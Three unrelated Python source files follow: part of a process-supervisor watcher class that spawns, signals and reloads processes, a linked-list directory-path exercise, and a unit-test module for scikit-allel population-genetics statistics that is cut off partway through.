self.call_hook('before_spawn'): return False cmd = util.replace_gnu_args(self.cmd, env=self.env) nb_tries = 0 while nb_tries < self.max_retry or self.max_retry == -1: process = None pipe_stdout = self.stdout_redirector is not None pipe_stderr = self.stderr_redirector is not None try: process = Process(self._nextwid, cmd, args=self.args, working_dir=self.working_dir, shell=self.shell, uid=self.uid, gid=self.gid, env=self.env, rlimits=self.rlimits, executable=self.executable, use_fds=self.use_sockets, watcher=self, pipe_stdout=pipe_stdout, pipe_stderr=pipe_stderr, close_child_stdout=self.close_child_stdout, close_child_stderr=self.close_child_stderr) # stream stderr/stdout if configured if pipe_stdout and self.stdout_redirector is not None: self.stdout_redirector.add_redirection('stdout', process, process.stdout) if pipe_stderr and self.stderr_redirector is not None: self.stderr_redirector.add_redirection('stderr', process, process.stderr) self.processes[process.pid] = process logger.debug('running %s process [pid %d]', self.name, process.pid) if not self.call_hook('after_spawn', pid=process.pid): self.kill_process(process) del self.processes[process.pid] return False except OSError as e: logger.warning('error in %r: %s', self.name, str(e)) if process is None: nb_tries += 1 continue else: self.notify_event("spawn", {"process_pid": process.pid, "time": time.time()}) return True return False @util.debuglog def send_signal_process(self, process, signum): """Send the signum signal to the process The signal is sent to the process itself then to all the children """ children = None try: # getting the process children children = process.children() # sending the signal to the process itself self.send_signal(process.pid, signum) self.notify_event("kill", {"process_pid": process.pid, "time": time.time()}) except NoSuchProcess: # already dead ! if children is None: return # now sending the same signal to all the children for child_pid in children: try: process.send_signal_child(child_pid, signum) self.notify_event("kill", {"process_pid": child_pid, "time": time.time()}) except NoSuchProcess: # already dead ! pass def _process_remove_redirections(self, process): """Remove process redirections """ if self.stdout_redirector is not None and process.stdout is not None: self.stdout_redirector.remove_redirection(process.stdout) if self.stderr_redirector is not None and process.stderr is not None: self.stderr_redirector.remove_redirection(process.stderr) @gen.coroutine @util.debuglog def kill_process(self, process): """Kill process (stop_signal, graceful_timeout then SIGKILL) """ if process.stopping: raise gen.Return(False) try: logger.debug("%s: kill process %s", self.name, process.pid) if self.stop_children: self.send_signal_process(process, self.stop_signal) else: self.send_signal(process.pid, self.stop_signal) self.notify_event("kill", {"process_pid": process.pid, "time": time.time()}) except NoSuchProcess: raise gen.Return(False) process.stopping = True waited = 0 while waited < self.graceful_timeout: if not process.is_alive(): break yield tornado_sleep(0.1) waited += 0.1 if waited >= self.graceful_timeout: # On Windows we can't send a SIGKILL signal, but the # process.stop function will terminate the process # later anyway if hasattr(signal, 'SIGKILL'): # We are not smart anymore self.send_signal_process(process, signal.SIGKILL) self._process_remove_redirections(process) process.stopping = False process.stop() raise gen.Return(True) @gen.coroutine @util.debuglog def kill_processes(self): """Kill all processes (stop_signal, graceful_timeout then SIGKILL) """ active_processes = self.get_active_processes() try: yield [self.kill_process(process) for process in active_processes] except OSError as e: if e.errno != errno.ESRCH: raise @util.debuglog def send_signal(self, pid, signum): is_sigkill = hasattr(signal, 'SIGKILL') and signum == signal.SIGKILL if pid in self.processes: process = self.processes[pid] hook_result = self.call_hook("before_signal", pid=pid, signum=signum) if not is_sigkill and not hook_result: logger.debug("before_signal hook didn't return True " "=> signal %i is not sent to %i" % (signum, pid)) else: process.send_signal(signum) self.call_hook("after_signal", pid=pid, signum=signum) else: logger.debug('process %s does not exist' % pid) @util.debuglog def send_signal_child(self, pid, child_id, signum): """Send signal to a child. """ process = self.processes[pid] try: process.send_signal_child(int(child_id), signum) except OSError as e: if e.errno != errno.ESRCH: raise @util.debuglog def send_signal_children(self, pid, signum): """Send signal to all children. """ process = self.processes[int(pid)] process.send_signal_children(signum) @util.debuglog def status(self): watcher_status = self._status process_list = [] for pid, process in sorted(self.processes.iteritems(), key=operator.itemgetter(0)): status = process.status_name info = process.info() if info == 'No such process (stopped?)': age = 'N/A' else: age = datetime.timedelta(seconds=info['age']) datum = { 'pid': pid, 'status': status, 'uptime': str(age), } process_list.append(datum) return {'watcher': watcher_status, 'processes': process_list} @util.debuglog def process_info(self, pid, extended=False): process = self.processes[int(pid)] result = process.info() if extended and 'extended_stats' in self.hooks: self.hooks['extended_stats'](self, self.arbiter, 'extended_stats', pid=pid, stats=result) return result @util.debuglog def info(self, extended=False): result = dict([(proc.pid, proc.info()) for proc in self.processes.values()]) if extended and 'extended_stats' in self.hooks: for pid, stats in result.items(): self.hooks['extended_stats'](self, self.arbiter, 'extended_stats', pid=pid, stats=stats) return result @util.synchronized("watcher_stop") @gen.coroutine def stop(self): yield self._stop() @util.debuglog @gen.coroutine def _stop(self, close_output_streams=False): if self.is_stopped(): return self._status = "stopping" logger.debug('stopping the %s watcher' % self.name) logger.debug('gracefully stopping processes [%s] for %ss' % ( self.name, self.graceful_timeout)) # We ignore the hook result self.call_hook('before_stop') yield self.kill_processes() self.reap_processes() # stop redirectors if self.stdout_redirector is not None: self.stdout_redirector.stop() self.stdout_redirector = None if self.stderr_redirector is not None: self.stderr_redirector.stop() self.stderr_redirector = None if close_output_streams: if self.stdout_stream and hasattr(self.stdout_stream['stream'], 'close'): self.stdout_stream['stream'].close() if self.stderr_stream and hasattr(self.stderr_stream['stream'], 'close'): self.stderr_stream['stream'].close() # notify about the stop if self.evpub_socket is not None: self.notify_event("stop", {"time": time.time()}) self._status = "stopped" # We ignore the hook result self.call_hook('after_stop') logger.info('%s stopped', self.name) def get_active_processes(self): """return a list of pids of active processes (not already stopped)""" return [p for p in self.processes.values() if p.status not in (DEAD_OR_ZOMBIE, UNEXISTING)] def get_active_pids(self): """return a list of pids of active processes (not already stopped)""" return [p.pid for p in self.processes.values() if p.status not in (DEAD_OR_ZOMBIE, UNEXISTING)] @property def pids(self): """Returns a list of PIDs""" return [process.pid for process in self.processes] @property def _nextwid(self): used_wids = set([p.wid for p in self.processes.values()]) all_wids = set(range(1, self.numprocesses * 2 + 1)) available_wids = sorted(all_wids - used_wids) try: return available_wids[0] except IndexError: raise RuntimeError("Process count > numproceses*2") def call_hook(self, hook_name, **kwargs): """Call a hook function""" hook_kwargs = {'watcher': self, 'arbiter': self.arbiter, 'hook_name': hook_name} hook_kwargs.update(kwargs) if hook_name in self.hooks: try: result = self.hooks[hook_name](**hook_kwargs) self.notify_event("hook_success", {"name": hook_name, "time": time.time()}) except Exception as error: logger.exception('Hook %r failed' % hook_name) result = hook_name in self.ignore_hook_failure self.notify_event("hook_failure", {"name": hook_name, "time": time.time(), "error": str(error)}) return result else: return True @util.synchronized("watcher_start") @gen.coroutine def start(self): before_pids = set() if self.is_stopped() else set(self.processes) yield self._start() after_pids = set(self.processes) raise gen.Return({'started': sorted(after_pids - before_pids), 'kept': sorted(after_pids & before_pids)}) @gen.coroutine @util.debuglog def _start(self): """Start. """ if self.pending_socket_event: return if not self.is_stopped(): if len(self.processes) < self.numprocesses: self.reap_processes() yield self.spawn_processes() return if not self.call_hook('before_start'): logger.debug('Aborting startup') return self._status = "starting" self._create_redirectors() yield self.spawn_processes() # If not self.processes, the before_spawn or after_spawn hooks have # probably prevented startup so give up if not self.processes or not self.call_hook('after_start'): logger.debug('Aborting startup') yield self._stop() return if self.stdout_redirector is not None: self.stdout_redirector.start() if self.stderr_redirector is not None: self.stderr_redirector.start() self._status = "active" logger.info('%s started' % self.name) self.notify_event("start", {"time": time.time()}) @util.synchronized("watcher_restart") @gen.coroutine def restart(self): before_pids = set() if self.is_stopped() else set(self.processes) yield self._restart() after_pids = set(self.processes) raise gen.Return({'stopped': sorted(before_pids - after_pids), 'started': sorted(after_pids - before_pids), 'kept': sorted(after_pids & before_pids)}) @gen.coroutine @util.debuglog def _restart(self): yield self._stop() yield self._start() @util.synchronized("watcher_reload") @gen.coroutine def reload(self, graceful=True, sequential=False): before_pids = set() if self.is_stopped() else set(self.processes) yield self._reload(graceful=graceful, sequential=sequential) after_pids = set(self.processes) raise gen.Return({'stopped': sorted(before_pids - after_pids), 'started': sorted(after_pids - before_pids), 'kept': sorted(after_pids & before_pids)}) @gen.coroutine @util.debuglog def _reload(self, graceful=True, sequential=False): """ reload """ if not(graceful) and sequential: logger.warn("with graceful=False, sequential=True is ignored") if self.prereload_fn is not None: self.prereload_fn(self) if not graceful: yield self._restart() return if self.is_stopped(): yield self._start() elif self.send_hup: for process in self.processes.values(): logger.info("SENDING HUP to %s" % process.pid) process.send_signal(signal.SIGHUP) else: if sequential: active_processes = self.get_active_processes() for process in active_processes: yield self.kill_process(process) self.reap_process(process.pid) self.spawn_process() yield tornado_sleep(self.warmup_delay) else: for i in range(self.numprocesses): self.spawn_process() yield self.manage_processes() self.notify_event("reload", {"time": time.time()}) logger.info('%s reloaded', self.name) @gen.coroutine def set_numprocesses(self, np): if np < 0: np = 0 if self.singleton and np > 1: raise ValueError('Singleton watcher has a single process') self.numprocesses = np yield self.manage_processes() raise gen.Return(self.numprocesses) @util.synchronized("watcher_incr") @gen.coroutine @util.debuglog def incr(self, nb=1): res = yield self.set_numprocesses(self.numprocesses + nb) raise gen.Return(res) @util.synchronized("watcher_decr") @gen.coroutine @util.debuglog def decr(self, nb=1): res = yield self.set_numprocesses(self.numprocesses - nb) raise gen.Return(res) @util.synchronized("watcher_set_opt") def set_opt(self, key, val): """Set a watcher option. This function set the watcher options. unknown keys are ignored. This function returns an action number: - 0: trigger the process management - 1: trigger a graceful reload of the processes; """ action = 0 if key in self._options: self._options[key] = val action = -1 # XXX for now does not trigger a reload elif key == "numprocesses": val = int(val) if val < 0: val = 0 if self.singleton and val > 1: raise ValueError('Singleton watcher has a single process') self.numprocesses = val elif key == "warmup_delay": self.warmup_delay = float(val) elif key == "working_dir": self.working_dir = val action = 1 elif key == "uid": self.uid = util.to_uid(val) action = 1 elif key == "gid": self.gid = util.to_gid(val) action = 1 elif key == "send_hup": self.send_hup = val elif key == "stop_signal": self.stop_signal = util.to_signum(val) elif key == "stop_children": self.stop_children = util.to_bool(val) elif key == "shell": self.shell = val action = 1 elif key == "env": if PY2 and IS_WINDOWS: # Windows on Python 2 does not accept Unicode values # in env dictionary self.env = dict((b(k), b(v)) for k, v in val.iteritems()) else: self.env = val action = 1 elif key == "cmd": self.cmd = val action = 1 elif key == "args": self.args = val action = 1 elif key == "graceful_timeout": self.graceful_timeout = float(val) action = -1 elif key == "max_age": self.max_age = int(val) action = 1 elif key == "max_age_variance": self.max_age_variance = int(val) action = 1 elif (key.startswith('stdout_stream') or key.startswith('stderr_stream')): action = self._reload_stream(key, val) elif key.startswith('hooks'): val = val.split(',') if len(val) == 2: ignore_error = util.to_bool(val[1]) else: ignore_error = False hook = val[0] self._reload_hook(key, hook, ignore_error) action = 0 # send update event self.notify_event("updated", {"time": time.time()}) return action @util.synchronized("watcher_do_action") @gen.coroutine def do_action(self, num): # trigger needed action if num == 0: yield self.manage_processes() elif not self.is_stopped(): # graceful restart yield self._reload() @util.debuglog def options(self, *args): options = [] for name in sorted(self.optnames): if name in self._options: options.append((name, self._options[name])) else: options.append((name, getattr(self, name))) return options def is_stopping(self): return self._status == 'stopping' def is_stopped(self): return self._status == 'stopped' def is_active(self): return self._status == 'active' def is_upgradable(self): return self.upgradable
the-stack_106_24326
class No: def __init__(self, value): self.value = value self.next = None class Diretorio: def __init__(self): self.first = No("\\") def insert(self, value=None): if self.first.value == "\\": self.first = No(str(value)) else: aux = self.first while aux.next is not None: aux = aux.next aux.next = No(str(value)) def remove(self): if self.first.value == "\\": self.first = No("\\") elif self.first.next is None: self.first = No("\\") else: aux = self.first aux_before = aux while aux.next is not None: aux_before = aux aux = aux.next aux_before.next = None def show(self): if self.first.value == "\\": print("\\") else: text = "" aux = self.first while aux.next is not None: text += "\\" + str(aux.value) aux = aux.next text += "\\" + str(aux.value) print(text) def main(): inputs = [] cont = True try: while cont: inputs.append(input()) except: pass diretorio = Diretorio() aux2 = inputs[0].split("\\") for i in aux2: if i == "": continue diretorio.insert(i) for i in inputs: if i[0] == 'c' and i[1] == 'd' and i[2] == " " and i[3] != ".": aux = i[3::] diretorio.insert(aux) elif i == "pwd": diretorio.show() elif i == "cd ..": diretorio.remove() if __name__ == '__main__': main()
the-stack_106_24327
# -*- coding: utf-8 -*- from __future__ import absolute_import, print_function, division import unittest import numpy as np from nose.tools import assert_raises, eq_ as eq from allel.test.tools import assert_array_equal as aeq, assert_array_almost_equal import allel from allel.util import ignore_invalid from allel import GenotypeArray, HaplotypeArray, SortedIndex, AlleleCountsArray class TestWindowUtilities(unittest.TestCase): def test_moving_statistic(self): f = allel.moving_statistic values = [2, 5, 8, 16] expect = [7, 24] actual = f(values, statistic=np.sum, size=2) aeq(expect, actual) values = [2, 5, 8, 16] expect = [7, 13, 24] actual = f(values, statistic=np.sum, size=2, step=1) aeq(expect, actual) def test_windowed_statistic(self): f = allel.windowed_statistic pos = [1, 12, 15, 27] # boolean array, all true b = [True, True, True, True] expected_nnz = [1, 2, 1] expected_windows = [[1, 10], [11, 20], [21, 27]] expected_counts = [1, 2, 1] actual_nnz, actual_windows, actual_counts = \ f(pos, b, np.count_nonzero, 10) aeq(expected_nnz, actual_nnz) aeq(expected_windows, actual_windows) aeq(expected_counts, actual_counts) # boolean array, not all true b = [False, True, False, True] expected_nnz = [0, 1, 1] expected_windows = [[1, 10], [11, 20], [21, 27]] expected_counts = [1, 2, 1] actual_nnz, actual_windows, actual_counts = \ f(pos, b, np.count_nonzero, 10) aeq(expected_windows, actual_windows) aeq(expected_nnz, actual_nnz) aeq(expected_counts, actual_counts) # explicit start and stop b = [False, True, False, True] expected_nnz = [1, 0, 1] expected_windows = [[5, 14], [15, 24], [25, 29]] expected_counts = [1, 1, 1] actual_nnz, actual_windows, actual_counts = \ f(pos, b, np.count_nonzero, 10, start=5, stop=29) aeq(expected_windows, actual_windows) aeq(expected_nnz, actual_nnz) aeq(expected_counts, actual_counts) # boolean array, bad length b = [False, True, False] with assert_raises(ValueError): f(pos, b, np.count_nonzero, 10) # 2D, 4 variants, 2 samples b = [[True, False], [True, True], [True, False], [True, True]] expected_nnz = [[1, 0], [2, 1], [1, 1]] expected_windows = [[1, 10], [11, 20], [21, 27]] expected_counts = [1, 2, 1] actual_nnz, actual_windows, actual_counts = \ f(pos, b, statistic=lambda x: np.sum(x, axis=0), size=10) aeq(expected_nnz, actual_nnz) aeq(expected_windows, actual_windows) aeq(expected_counts, actual_counts) def test_per_base(self): pos = [1, 12, 15, 27] # boolean array, all true b = [True, True, True, True] # N.B., final bin includes right edge expected_nnz = [1, 2, 1] expected_windows = [[1, 10], [11, 20], [21, 27]] expected_counts = [1, 2, 1] expected_densities = [1/10, 2/10, 1/7] expected_n_bases = [10, 10, 7] nnz, windows, counts = allel.windowed_statistic( pos, b, statistic=np.count_nonzero, size=10, start=1 ) densities, n_bases = allel.per_base(nnz, windows) aeq(expected_nnz, nnz) aeq(expected_windows, windows) aeq(expected_counts, counts) aeq(expected_densities, densities) aeq(expected_n_bases, n_bases) # boolean array, not all true b = [False, True, False, True] expected_densities = [0/10, 1/10, 1/7] expected_n_bases = [10, 10, 7] nnz, windows, counts = allel.windowed_statistic( pos, b, statistic=np.count_nonzero, size=10, start=1 ) densities, n_bases = allel.per_base(nnz, windows) aeq(expected_densities, densities) aeq(expected_n_bases, n_bases) # 2D, 4 variants, 2 samples b = [[True, False], [True, True], [True, False], [True, True]] expected_densities = [[1/10, 0/10], [2/10, 1/10], [1/7, 1/7]] expected_n_bases = [10, 10, 7] nnz, windows, counts = allel.windowed_statistic( pos, b, statistic=lambda x: np.sum(x, axis=0), size=10, start=1 ) densities, n_bases = allel.per_base(nnz, windows) aeq(expected_densities, densities) aeq(expected_n_bases, n_bases) # include is_accessible array option is_accessible = np.array([0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 0, 0, 1, 1, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], dtype=bool) b = [False, True, False, True] expected_densities = [-1, 1/6, 1/7] expected_n_bases = [0, 6, 7] nnz, windows, counts = allel.windowed_statistic( pos, b, statistic=np.count_nonzero, size=10, start=1 ) densities, n_bases = allel.per_base(nnz, windows, is_accessible=is_accessible, fill=-1) aeq(expected_densities, densities) aeq(expected_n_bases, n_bases) class TestDiversityDivergence(unittest.TestCase): def test_mean_pairwise_diversity(self): # start with simplest case, two haplotypes, one pairwise comparison h = HaplotypeArray([[0, 0], [1, 1], [0, 1], [1, 2], [0, -1], [-1, -1]]) ac = h.count_alleles() expect = [0, 0, 1, 1, -1, -1] actual = allel.mean_pairwise_difference(ac, fill=-1) aeq(expect, actual) # four haplotypes, 6 pairwise comparison h = HaplotypeArray([[0, 0, 0, 0], [0, 0, 0, 1], [0, 0, 1, 1], [0, 1, 1, 1], [1, 1, 1, 1], [0, 0, 1, 2], [0, 1, 1, 2], [0, 1, -1, -1], [-1, -1, -1, -1]]) ac = h.count_alleles() expect = [0, 3/6, 4/6, 3/6, 0, 5/6, 5/6, 1, -1] actual = allel.mean_pairwise_difference(ac, fill=-1) assert_array_almost_equal(expect, actual) def test_sequence_divergence(self): from allel import sequence_divergence pos = [2, 4, 8] ac1 = AlleleCountsArray([[2, 0], [2, 0], [2, 0]]) ac2 = AlleleCountsArray([[0, 2], [0, 2], [0, 2]]) # all variants e = 3 / 7 a = sequence_divergence(pos, ac1, ac2) eq(e, a) # start/stop e = 2 / 6 a = sequence_divergence(pos, ac1, ac2, start=0, stop=5) eq(e, a) # start/stop, an provided an1 = ac1.sum(axis=1) an2 = ac2.sum(axis=1) e = 2 / 6 a = sequence_divergence(pos, ac1, ac2, start=0, stop=5, an1=an1, an2=an2) eq(e, a) def test_windowed_diversity(self): # four haplotypes, 6 pairwise comparison h = HaplotypeArray([[0, 0, 0, 0], [0, 0, 0, 1], [0, 0, 1, 1], [0, 1, 1, 1], [1, 1, 1, 1], [0, 0, 1, 2], [0, 1, 1, 2], [0, 1, -1, -1], [-1, -1, -1, -1]]) ac = h.count_alleles() # mean pairwise diversity # expect = [0, 3/6, 4/6, 3/6, 0, 5/6, 5/6, 1, -1] pos = SortedIndex([2, 4, 7, 14, 15, 18, 19, 25, 27]) expect = [(7/6)/10, (13/6)/10, 1/11] actual, _, _, _ = allel.windowed_diversity(pos, ac, size=10, start=1, stop=31) assert_array_almost_equal(expect, actual) def test_mean_pairwise_divergence(self): # simplest case, two haplotypes in each population h = HaplotypeArray([[0, 0, 0, 0], [0, 0, 0, 1], [0, 0, 1, 1], [0, 1, 1, 1], [1, 1, 1, 1], [0, 0, 1, 2], [0, 1, 1, 2], [0, 1, -1, -1], [-1, -1, -1, -1]]) h1 = h.take([0, 1], axis=1) h2 = h.take([2, 3], axis=1) ac1 = h1.count_alleles() ac2 = h2.count_alleles() expect = [0/4, 2/4, 4/4, 2/4, 0/4, 4/4, 3/4, -1, -1] actual = allel.mean_pairwise_difference_between(ac1, ac2, fill=-1) aeq(expect, actual) def test_windowed_divergence(self): # simplest case, two haplotypes in each population h = HaplotypeArray([[0, 0, 0, 0], [0, 0, 0, 1], [0, 0, 1, 1], [0, 1, 1, 1], [1, 1, 1, 1], [0, 0, 1, 2], [0, 1, 1, 2], [0, 1, -1, -1], [-1, -1, -1, -1]]) h1 = h.take([0, 1], axis=1) h2 = h.take([2, 3], axis=1) ac1 = h1.count_alleles() ac2 = h2.count_alleles() # mean pairwise divergence # expect = [0/4, 2/4, 4/4, 2/4, 0/4, 4/4, 3/4, -1, -1] pos = SortedIndex([2, 4, 7, 14, 15, 18, 19, 25, 27]) expect = [(6/4)/10, (9/4)/10, 0/11] actual, _, _, _ = allel.windowed_divergence( pos, ac1, ac2, size=10, start=1, stop=31 ) assert_array_almost_equal(expect, actual) class TestHardyWeinberg(unittest.TestCase): def test_heterozygosity_observed(self): # diploid g = GenotypeArray([[[0, 0], [0, 0]], [[1, 1], [1, 1]], [[1, 1], [2, 2]], [[0, 0], [0, 1]], [[0, 0], [0, 2]], [[1, 1], [1, 2]], [[0, 1], [0, 1]], [[0, 1], [1, 2]], [[0, 0], [-1, -1]], [[0, 1], [-1, -1]], [[-1, -1], [-1, -1]]], dtype='i1') expect = [0, 0, 0, .5, .5, .5, 1, 1, 0, 1, -1] actual = allel.heterozygosity_observed(g, fill=-1) aeq(expect, actual) # polyploid g = GenotypeArray([[[0, 0, 0], [0, 0, 0]], [[1, 1, 1], [1, 1, 1]], [[1, 1, 1], [2, 2, 2]], [[0, 0, 0], [0, 0, 1]], [[0, 0, 0], [0, 0, 2]], [[1, 1, 1], [0, 1, 2]], [[0, 0, 1], [0, 1, 1]], [[0, 1, 1], [0, 1, 2]], [[0, 0, 0], [-1, -1, -1]], [[0, 0, 1], [-1, -1, -1]], [[-1, -1, -1], [-1, -1, -1]]], dtype='i1') expect = [0, 0, 0, .5, .5, .5, 1, 1, 0, 1, -1] actual = allel.heterozygosity_observed(g, fill=-1) aeq(expect, actual) def test_heterozygosity_expected(self): def refimpl(f, ploidy, fill=0): """Limited reference implementation for testing purposes.""" # check allele frequencies sum to 1 af_sum = np.sum(f, axis=1) # assume three alleles p = f[:, 0] q = f[:, 1] r = f[:, 2] out = 1 - p**ploidy - q**ploidy - r**ploidy with ignore_invalid(): out[(af_sum < 1) | np.isnan(af_sum)] = fill return out # diploid g = GenotypeArray([[[0, 0], [0, 0]], [[1, 1], [1, 1]], [[1, 1], [2, 2]], [[0, 0], [0, 1]], [[0, 0], [0, 2]], [[1, 1], [1, 2]], [[0, 1], [0, 1]], [[0, 1], [1, 2]], [[0, 0], [-1, -1]], [[0, 1], [-1, -1]], [[-1, -1], [-1, -1]]], dtype='i1') expect1 = [0, 0, 0.5, .375, .375, .375, .5, .625, 0, .5, -1] af = g.count_alleles().to_frequencies() expect2 = refimpl(af, ploidy=g.ploidy, fill=-1) actual = allel.heterozygosity_expected(af, ploidy=g.ploidy, fill=-1) assert_array_almost_equal(expect1, actual) assert_array_almost_equal(expect2, actual) expect3 = [0, 0, 0.5, .375, .375, .375, .5, .625, 0, .5, 0] actual = allel.heterozygosity_expected(af, ploidy=g.ploidy, fill=0) assert_array_almost_equal(expect3, actual) # polyploid g = GenotypeArray([[[0, 0, 0], [0, 0, 0]], [[1, 1, 1], [1, 1, 1]], [[1, 1, 1], [2, 2, 2]], [[0, 0, 0], [0, 0, 1]], [[0, 0, 0], [0, 0, 2]], [[1, 1, 1], [0, 1, 2]], [[0, 0, 1], [0, 1, 1]], [[0, 1, 1], [0, 1, 2]], [[0, 0, 0], [-1, -1, -1]], [[0, 0, 1], [-1, -1, -1]], [[-1, -1, -1], [-1, -1, -1]]], dtype='i1') af = g.count_alleles().to_frequencies() expect = refimpl(af, ploidy=g.ploidy, fill=-1) actual = allel.heterozygosity_expected(af, ploidy=g.ploidy, fill=-1) assert_array_almost_equal(expect, actual) def test_inbreeding_coefficient(self): # diploid g = GenotypeArray([[[0, 0], [0, 0]], [[1, 1], [1, 1]], [[1, 1], [2, 2]], [[0, 0], [0, 1]], [[0, 0], [0, 2]], [[1, 1], [1, 2]], [[0, 1], [0, 1]], [[0, 1], [1, 2]], [[0, 0], [-1, -1]], [[0, 1], [-1, -1]], [[-1, -1], [-1, -1]]], dtype='i1') # ho = np.array([0, 0, 0, .5, .5, .5, 1, 1, 0, 1, -1]) # he = np.array([0, 0, 0.5, .375, .375, .375, .5, .625, 0, .5, -1]) # expect = 1 - (ho/he) expect = [-1, -1, 1-0, 1-(.5/.375), 1-(.5/.375), 1-(.5/.375), 1-(1/.5), 1-(1/.625), -1, 1-(1/.5), -1] actual = allel.inbreeding_coefficient(g, fill=-1) assert_array_almost_equal(expect, actual) class TestDistance(unittest.TestCase): def test_pdist(self): h = HaplotypeArray([[0, 0, 0, 0], [0, 0, 0, 1], [0, 0, 1, 1], [0, 1, 1, 1], [1, 1, 1, 1], [0, 0, 1, 2], [0, 1, 1, 2], [0, 1, -1, -1], [-1, -1, -1, -1]]) import scipy.spatial d1 = scipy.spatial.distance.pdist(h.T, 'hamming') d2 = allel.stats.distance.pdist(h, 'hamming') aeq(d1, d2) def test_pairwise_distance_multidim(self): g = GenotypeArray([[[0, 0], [0, 0]], [[1, 1], [1, 1]], [[1, 1], [2, 2]], [[0, 0], [0, 1]], [[0, 0], [0, 2]], [[1, 1], [1, 2]], [[0, 1], [0, 1]], [[0, 1], [1, 2]], [[0, 0], [-1, -1]], [[0, 1], [-1, -1]], [[-1, -1], [-1, -1]]], dtype='i1') gac = g.to_allele_counts() def metric(ac1, ac2): mpd = allel.mean_pairwise_difference_between(ac1, ac2, fill=0) return mpd.sum() expect = [allel.mean_pairwise_difference_between(gac[:, 0], gac[:, 1], fill=0).sum()] actual = allel.pairwise_distance(gac, metric) aeq(expect, actual) def test_condensed_coords(self): from allel import condensed_coords eq(0, condensed_coords(0, 1, 2)) eq(0, condensed_coords(1, 0, 2)) eq(0, condensed_coords(0, 1, 3)) eq(0, condensed_coords(1, 0, 3)) eq(1, condensed_coords(0, 2, 3)) eq(1, condensed_coords(2, 0, 3)) eq(2, condensed_coords(1, 2, 3)) eq(2, condensed_coords(2, 1, 3)) with assert_raises(ValueError): condensed_coords(0, 0, 1) condensed_coords(0, 1, 1) condensed_coords(1, 0, 1) condensed_coords(0, 0, 2) condensed_coords(0, 2, 2) condensed_coords(2, 0, 2) condensed_coords(1, 1, 2) condensed_coords(0, 0, 3) condensed_coords(1, 1, 3) condensed_coords(2, 2, 3) def test_condensed_coords_within(self): from allel import condensed_coords_within pop = [0, 1] n = 3 expect = [0] actual = condensed_coords_within(pop, n) eq(expect, actual) pop = [0, 2] n = 3 expect = [1] actual = condensed_coords_within(pop, n) eq(expect, actual) pop = [1, 2] n = 3 expect = [2] actual = condensed_coords_within(pop, n) eq(expect, actual) pop = [0, 1, 3] n = 4 expect = [0, 2, 4] actual = condensed_coords_within(pop, n) eq(expect, actual) pop = [0, 0] with assert_raises(ValueError): condensed_coords_within(pop, n) def test_condensed_coords_between(self): from allel import condensed_coords_between pop1 = [0, 1] pop2 = [2, 3] n = 4 expect = [1, 2, 3, 4] actual = condensed_coords_between(pop1, pop2, n) eq(expect, actual) pop1 = [0, 2] pop2 = [1, 3] n = 4 expect = [0, 2, 3, 5] actual = condensed_coords_between(pop1, pop2, n) eq(expect, actual) with assert_raises(ValueError): condensed_coords_between(pop1, pop1, n) class TestLinkageDisequilibrium(unittest.TestCase): def test_rogers_huff_r(self): gn = [[0, 1, 2], [0, 1, 2]] expect = 1. actual = allel.rogers_huff_r(gn) eq(expect, actual) gn = [[0, 1, 2], [2, 1, 0]] expect = -1. actual = allel.rogers_huff_r(gn) eq(expect, actual) gn = [[0, 0, 0], [1, 1, 1]] actual = allel.rogers_huff_r(gn) assert np.isnan(actual) gn = [[0, 1, 0, 1], [0, 1, 1, 0]] expect = 0 actual = allel.rogers_huff_r(gn) eq(expect, actual) gn = [[0, 1, 2, -1], [0, 1, 2, 2]] expect = 1. actual = allel.rogers_huff_r(gn) eq(expect, actual) gn = [[0, 1, 2, 2], [0, 1, 2, -1]] expect = 1. actual = allel.rogers_huff_r(gn) eq(expect, actual) gn = [[0, 1, 2], [0, 1, -1]] expect = 1. actual = allel.rogers_huff_r(gn) eq(expect, actual) gn = [[0, 2], [2, 0], [0, 1]] expect = [-1, 1, -1] actual = allel.rogers_huff_r(gn) assert_array_almost_equal(expect, actual) gn = [[0, 2, 0], [0, 2, 0], [2, 0, 2], [0, 2, -1]] expect = [1, -1, 1, -1, 1, -1] actual = allel.rogers_huff_r(gn) assert_array_almost_equal(expect, actual) def test_rogers_huff_r_between(self): gna = [[0, 1, 2]] gnb = [[0, 1, 2]] expect = 1. actual = allel.rogers_huff_r_between(gna, gnb) eq(expect, actual) gna = [[0, 1, 2]] gnb = [[2, 1, 0]] expect = -1. actual = allel.rogers_huff_r_between(gna, gnb) eq(expect, actual) gna = [[0, 0, 0]] gnb = [[1, 1, 1]] actual = allel.rogers_huff_r_between(gna, gnb) assert np.isnan(actual) def test_locate_unlinked(self): gn = [[0, 1, 2], [0, 1, 2]] expect = [True, False] actual = allel.locate_unlinked(gn, size=2, step=2, threshold=.5) aeq(expect, actual) gn = [[0, 1, 1, 2], [0, 1, 1, 2], [1, 1, 0, 2], [1, 1, 0, 2]] actual = allel.locate_unlinked(gn, size=2, step=1, threshold=.5) expect = [True, False, True, False] aeq(expect, actual) gn = [[0, 1, 1, 2], [0, 1, 1, 2], [0, 1, 1, 2], [1, 1, 0, 2], [1, 1, 0, 2]] actual = allel.locate_unlinked(gn, size=2, step=1, threshold=.5) expect = [True, False, True, True, False] aeq(expect, actual) actual = allel.locate_unlinked(gn, size=3, step=1, threshold=.5) expect = [True, False, False, True, False] aeq(expect, actual) # test with bcolz carray import bcolz gnz = bcolz.carray(gn, chunklen=2) actual = allel.locate_unlinked(gnz, size=2, step=1, threshold=.5, blen=2) expect = [True, False, True, True, False] aeq(expect, actual) class TestAdmixture(unittest.TestCase): def test_patterson_f2(self): aca = [[0, 2], [2, 0], [1, 1], [0, 0]] acb = [[0, 2], [0, 2], [0, 2], [0, 2]] expect = [0., 1., 0., np.nan] actual = allel.patterson_f2(aca, acb) assert_array_almost_equal(expect, actual) def test_patterson_f3(self): aca = [[0, 2], [2, 0], [0, 2], [0, 2], [0, 0]] acb = [[2, 0], [0, 2], [0, 2], [0, 2], [0, 2]] acc = [[1, 1], [1, 1], [0, 2], [2, 0], [1, 1]] expect_f3 = [-.5, -.5, 0., 1., np.nan] actual_f3, actual_hzc = allel.patterson_f3(acc, aca, acb) assert_array_almost_equal(expect_f3, actual_f3) expect_hzc = [1., 1., 0., 0., 1.] assert_array_almost_equal(expect_hzc, actual_hzc) def test_patterson_d(self): aca = [[0, 2], [2, 0], [2, 0], [1, 1], [0, 0]] acb = [[0, 2], [0, 2], [0, 2], [1, 1], [0, 2]] acc = [[2, 0], [2, 0], [0, 2], [1, 1], [0, 2]] acd = [[2, 0], 